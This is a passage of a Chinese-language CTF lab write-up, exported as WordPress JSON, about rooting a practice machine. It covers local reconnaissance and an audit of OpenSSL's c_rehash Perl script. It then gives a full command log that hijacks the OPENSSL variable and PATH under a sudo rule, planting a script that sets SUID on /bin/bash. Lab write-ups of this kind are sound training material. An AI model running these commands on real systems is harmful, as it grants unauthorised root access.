            if ($symlink_exists) {\n                        print "link $fname -> $hash\\n" if $verbose;\n                        symlink $fname, $hash || warn "Can't symlink, $!";\n                } else {\n                        print "copy $fname -> $hash\\n" if $verbose;\n                        if (open($in, "<", $fname)) {\n                            if (open($out,">", $hash)) {\n                                print $out $_ while (<$in>);\n                                close $out;\n                            } else {\n                                warn "can't open $hash for write, $!";\n                            }\n                            close $in;\n                        } else {\n                            warn "can't open $fname for read, $!";\n                        }\n                }\n                $hashlist{$hash} = $fprint;\n}\n\nsub link_hash_cert_old {\n                link_hash_cert($_[0], '-subject_hash_old');\n}\n\nsub link_hash_crl_old {\n                link_hash_crl($_[0], '-hash_old');\n}\n\n# Same as above except for a CRL. CRL links are of the form <hash>.r<n>\n\nsub link_hash_crl {\n                my $fname = $_[0];\n                my $crlhash = $_[1] || "-hash";\n                $fname =~ s\/'\/'\\\\''\/g;\n                my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;\n                chomp $hash;\n                chomp $fprint;\n                $fprint =~ s\/^.*=\/\/;\n                $fprint =~ tr\/:\/\/d;\n                my $suffix = 0;\n                # Search for an unused hash filename\n                while(exists $hashlist{"$hash.r$suffix"}) {\n                        # Hash matches: if fingerprint matches its a duplicate cert\n                        if ($hashlist{"$hash.r$suffix"} eq $fprint) {\n                                print STDERR "WARNING: Skipping duplicate CRL $fname\\n";\n                                return;\n                        }\n                        $suffix++;\n                }\n                $hash .= ".r$suffix";\n                if ($symlink_exists) {\n                        print "link $fname -> $hash\\n" if $verbose;\n                        symlink $fname, $hash || warn "Can't symlink, $!";\n                } else {\n                        print "cp $fname -> $hash\\n" if $verbose;\n                        system ("cp", $fname, $hash);\n                        warn "Can't copy, $!" if ($? >> 8) != 0;\n                }\n                $hashlist{$hash} = $fprint;\n}<\/code><\/pre>\n
    \u4e0a\u4f20\u4e00\u4e2apspy64<\/code>\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\u60c5\u51b5\uff1a<\/p>\n
    \"image-20250611214315264\"<\/div><\/p>\n
    \u4e0a\u4f20linpeas.sh<\/code>\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
    \"image-20250611214809475\"<\/div>
    \n
    \"image-20250611214824549\"<\/div>
    \n
    \"image-20250611215047111\"<\/div>
    \n
    \"image-20250611215219115\"<\/div><\/p>\n
    \u8fd9\u4e2apwnkit<\/code>\u663e\u793a\u6700\u65e9\u62ab\u9732\u65f6\u95f4\u4e3a\uff1a<\/p>\n
    \"image-20250611215735173\"<\/div><\/p>\n
    \u4f46\u662f\u9776\u673a\u521b\u7acb\u65f6\u95f4\u4e3a2021.02.05<\/code>\uff0c\u611f\u89c9\u4e0d\u50cf\u662f\u8003\u8fd9\u4e2a\u7684\u3002\u3002<\/p>\n
    \u811a\u672c\u8def\u5f84\u52ab\u6301\u63d0\u6743<\/h3>\n
    \u8ba9AI\u5206\u6790\u4e00\u4e0b\u4e0a\u4e00\u4e2a\u957f\u811a\u672c\uff0c\u770b\u770b\u6d41\u7a0b\u662f\u548b\u6837\u7684\uff1a<\/p>\n
    \n
    \u4ee5\u4e0b\u662f c_rehash<\/code> \u811a\u672c\u7684\u7b80\u6d01\u6267\u884c\u6d41\u7a0b\u548c\u5173\u952e\u7ec6\u8282\u5206\u6790\uff1a<\/p>\n
    \u4e00\u3001\u6838\u5fc3\u529f\u80fd<\/strong><\/h3>\n
    \u4e3a\u6307\u5b9a\u76ee\u5f55\u4e2d\u7684\u8bc1\u4e66\/CRL\u6587\u4ef6\u521b\u5efa\u54c8\u5e0c\u503c\u547d\u540d\u7684\u7b26\u53f7\u94fe\u63a5\uff08\u6216\u62f7\u8d1d\uff09\uff0c\u7528\u4e8e OpenSSL \u5feb\u901f\u67e5\u627e\u8bc1\u4e66\u3002\u652f\u6301\u6587\u4ef6\u7c7b\u578b\uff1a.pem<\/code>, .crt<\/code>, .cer<\/code>, .crl<\/code>\u3002<\/p>\n
    \n
    \u4e8c\u3001\u6267\u884c\u6d41\u7a0b<\/strong><\/h3>\n
      \n
    1. \n
      \u521d\u59cb\u5316\u914d\u7f6e<\/strong><\/p>\n
        \n
      • \u9ed8\u8ba4\u76ee\u5f55\uff1a\/usr\/lib\/ssl\/certs<\/code><\/li>\n
      • \u4f18\u5148\u4f7f\u7528\u73af\u5883\u53d8\u91cf SSL_CERT_DIR<\/code> \u6216\u547d\u4ee4\u884c\u53c2\u6570\u6307\u5b9a\u76ee\u5f55\u3002<\/li>\n<\/ul>\n<\/li>\n
      • \n
        \u53c2\u6570\u89e3\u6790<\/strong><\/p>\n
        -n      # \u4fdd\u7559\u73b0\u6709\u94fe\u63a5\uff08\u4e0d\u5220\u9664\uff09\n-v      # \u663e\u793a\u8be6\u7ec6\u64cd\u4f5c\u65e5\u5fd7\n-h      # \u663e\u793a\u5e2e\u52a9<\/code><\/pre>\n<\/li>\n
      • \n
        \u76ee\u5f55\u5904\u7406<\/strong><\/p>\n
          \n
        • \u68c0\u67e5\u76ee\u5f55\u53ef\u5199\u6743\u9650\uff0c\u8df3\u8fc7\u65e0\u6743\u9650\u76ee\u5f55\u3002<\/li>\n
        • \u5220\u9664\u65e7\u54c8\u5e0c\u94fe\u63a5\uff08\u9664\u975e -n<\/code> \u53c2\u6570\u542f\u7528\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n
        • \n
          \u6587\u4ef6\u626b\u63cf\u4e0e\u5206\u7c7b<\/strong><\/p>\n
            \n
          • \n
            \u626b\u63cf\u76ee\u5f55\u4e2d\u6240\u6709\u8bc1\u4e66\/CRL\u6587\u4ef6\u3002<\/p>\n<\/li>\n
          • \n
            \u901a\u8fc7\u6587\u4ef6\u5934\u9a8c\u8bc1\u7c7b\u578b\uff1a<\/p>\n
            -----BEGIN CERTIFICATE-----  # \u8bc1\u4e66\u6587\u4ef6\n-----BEGIN X509 CRL-----      # CRL\u6587\u4ef6<\/code><\/pre>\n<\/li>\n<\/ul>\n<\/li>\n
          • \n
            \u751f\u6210\u54c8\u5e0c\u94fe\u63a5<\/strong><\/p>\n
              \n
            • \u8bc1\u4e66\u6587\u4ef6<\/strong> \u2192 \u8c03\u7528 openssl x509 -subject_hash<\/code> \u8ba1\u7b97\u54c8\u5e0c\u503c\uff0c\u547d\u540d\u683c\u5f0f\uff1a<\u54c8\u5e0c>.<\u5e8f\u53f7><\/code>\uff08\u5982 3a2b1c.0<\/code>\uff09\u3002<\/li>\n
            • CRL\u6587\u4ef6<\/strong> \u2192 \u8c03\u7528 openssl crl -hash<\/code> \u8ba1\u7b97\u54c8\u5e0c\u503c\uff0c\u547d\u540d\u683c\u5f0f\uff1a<\u54c8\u5e0c>.r<\u5e8f\u53f7><\/code>\uff08\u5982 5d4e3f.r0<\/code>\uff09\u3002<\/li>\n
            • \u82e5\u54c8\u5e0c\u51b2\u7a81\uff0c\u9012\u589e\u5e8f\u53f7\u907f\u514d\u8986\u76d6\u3002<\/li>\n<\/ul>\n<\/li>\n
            • \n
              \u521b\u5efa\u94fe\u63a5\/\u62f7\u8d1d<\/strong><\/p>\n
                \n
              • \u7cfb\u7edf\u652f\u6301\u7b26\u53f7\u94fe\u63a5 \u2192 \u521b\u5efa\u7b26\u53f7\u94fe\u63a5\u3002<\/li>\n
              • \u7cfb\u7edf\u4e0d\u652f\u6301\u7b26\u53f7\u94fe\u63a5 \u2192 \u76f4\u63a5\u62f7\u8d1d\u6587\u4ef6\u3002<\/li>\n<\/ul>\n<\/li>\n
              • \n
                \u9000\u51fa\u72b6\u6001<\/strong><\/p>\n
                  \n
                • \u8fd4\u56de\u9519\u8bef\u8ba1\u6570\uff080 \u8868\u793a\u5168\u90e8\u6210\u529f\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n
                  \n
                  \u4e09\u3001\u5b89\u5168\u7ec6\u8282<\/strong><\/h3>\n
                    \n
                  1. \n
                    \u6587\u4ef6\u540d\u6ce8\u5165\u9632\u62a4<\/strong>
                    \n\u6587\u4ef6\u540d\u4e2d\u7684\u5355\u5f15\u53f7\u88ab\u8f6c\u4e49\uff1a$fname =~ s\/'\/'\\\\''\/g<\/code>\uff0c\u9632\u6b62\u547d\u4ee4\u6ce8\u5165\uff08\u4fee\u590d CVE-2022-1292\uff09\u3002<\/p>\n
                    # \u5b89\u5168\u6267\u884c\u547d\u4ee4\u793a\u4f8b\uff1a\nopenssl x509 -in '$escaped_fname' -hash -noout<\/code><\/code><\/pre>\n<\/li>\n
                  2. \n
                    \u91cd\u590d\u6587\u4ef6\u5904\u7406<\/strong><\/p>\n
                      \n
                    • \u901a\u8fc7 SHA-1 \u6307\u7eb9\u68c0\u6d4b\u91cd\u590d\u6587\u4ef6\uff0c\u8df3\u8fc7\u91cd\u590d\u9879\u5e76\u544a\u8b66\u3002<\/li>\n<\/ul>\n
                      WARNING: Skipping duplicate certificate $fname<\/code><\/pre>\n<\/li>\n<\/ol>\n
                      \n
                      \u56db\u3001\u4f7f\u7528\u793a\u4f8b<\/strong><\/h3>\n
                      # \u57fa\u672c\u7528\u6cd5\uff08\u5904\u7406\u9ed8\u8ba4\u76ee\u5f55\uff09\nc_rehash\n\n# \u5904\u7406\u81ea\u5b9a\u4e49\u76ee\u5f55\uff08\u663e\u793a\u8be6\u7ec6\u65e5\u5fd7\uff09\nc_rehash -v \/path\/to\/certs\n\n# \u4fdd\u7559\u73b0\u6709\u94fe\u63a5\u5e76\u5904\u7406\u591a\u4e2a\u76ee\u5f55\nc_rehash -n \/dir1 \/dir2<\/code><\/pre>\n
                      \n
                      \u63d0\u793a<\/strong>\uff1a\u8be5\u811a\u672c\u5e38\u7528\u4e8e\u914d\u7f6e OpenSSL \u7684\u8bc1\u4e66\u76ee\u5f55\uff0c\u4f7f curl --capath<\/code> \u7b49\u5de5\u5177\u80fd\u901a\u8fc7\u54c8\u5e0c\u503c\u5feb\u901f\u5b9a\u4f4d\u8bc1\u4e66\u3002<\/p>\n<\/blockquote>\n<\/blockquote>\n
                      \u4f46\u662f\u6211\u81ea\u5df1\u5ba1\u8ba1\u65f6\u5019\u53d1\u73b0\u5b58\u5728\u4e00\u5904\u52ab\u6301\u6f0f\u6d1emy $openssl = $ENV{OPENSSL} || "openssl";<\/code>\uff0c\u8fd9\u4ee3\u8868\u82e5\u7528\u6237\u901a\u8fc7 export OPENSSL=\/\u81ea\u5b9a\u4e49\u8def\u5f84\/openssl<\/code> \u663e\u5f0f\u6307\u5b9a\u8def\u5f84\uff0c\u5219\u4f7f\u7528\u8be5\u503c\uff0c\u5f53 $ENV{OPENSSL}<\/code> \u4e3a\u7a7a\u65f6\uff0c\u4f7f\u7528\u9ed8\u8ba4\u503c\u5b57\u7b26\u4e32 "openssl"<\/code>\u3002<\/p>\n
                        \n
                      • \u81ea\u5b9a\u4e49\u4e00\u4e2a\u6076\u610f\u811a\u672copenssl<\/code><\/li>\n
                      • \u4fee\u6539\u8def\u5f84<\/li>\n
                      • sudo \u8fd0\u884c\u811a\u672c\uff0c\u6076\u610f\u4ee3\u7801\u6267\u884c\u3002<\/li>\n<\/ul>\n
                        (remote) maria@hash:\/tmp$ echo "chmod +s \/bin\/bash" > openssl\n(remote) maria@hash:\/tmp$ chmod +x openssl \n(remote) maria@hash:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1168776 Apr 18  2019 \/bin\/bash\n(remote) maria@hash:\/tmp$ echo $PATH\n\/usr\/bin:\/bin:\/usr\/local\/bin:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) maria@hash:\/tmp$ PATH=$PWD:$PATH\n(remote) maria@hash:\/tmp$ echo $PATH\n\/tmp:\/usr\/bin:\/bin:\/usr\/local\/bin:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) maria@hash:\/tmp$ sudo -l\nMatching Defaults entries for maria on hash:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser maria may run the following commands on hash:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/c_rehash\n(remote) maria@hash:\/tmp$ sudo \/usr\/bin\/c_rehash\nDoing \/usr\/lib\/ssl\/certs\nWARNING: Skipping duplicate certificate ACCVRAIZ1.pem\nWARNING: Skipping duplicate certificate AC_RAIZ_FNMT-RCM.pem\nWARNING: Skipping duplicate certificate AC_RAIZ_FNMT-RCM.pem\n--------------\nWARNING: Skipping duplicate certificate thawte_Primary_Root_CA_-_G2.pem\nWARNING: Skipping duplicate certificate thawte_Primary_Root_CA_-_G3.pem\nWARNING: Skipping duplicate certificate thawte_Primary_Root_CA_-_G3.pem\n(remote) maria@hash:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1168776 Apr 18  2019 \/bin\/bash<\/code><\/pre>\n
                        \u6210\u529f\u6267\u884c\u4e86\u547d\u4ee4\uff0c\u62ff\u4e0brootshell\uff01\uff01\uff01<\/p>\n
                        \"image-20250611223333290\"<\/div><\/p>\n
                        \u8fd9\u91cc\u6267\u884c\u4e0d\u4e86flag.sh<\/code>\u6ca1\u4e8b\uff0c\u53cd\u5f39shell\u5c31\u53ef\u4ee5\u6b63\u5e38\u663e\u793a\u4e86\u3002<\/p>\n
                        \"image-20250611223544112\"<\/div>
                        \n
                        \"image-20250611223606567\"<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"
                        Hash \u540e\u53f0\u5728\u66f4\u65b0\uff0c\u53ef\u80fd\u51fa\u73b0\u4e0d\u53ef\u540d\u72b6\u7684bug\u3002\u3002\u3002\u3002 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~ […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-857","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/857","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=857"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/857\/revisions"}],"predecessor-version":[{"id":858,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/857\/revisions\/858"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=857"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=857"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=857"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}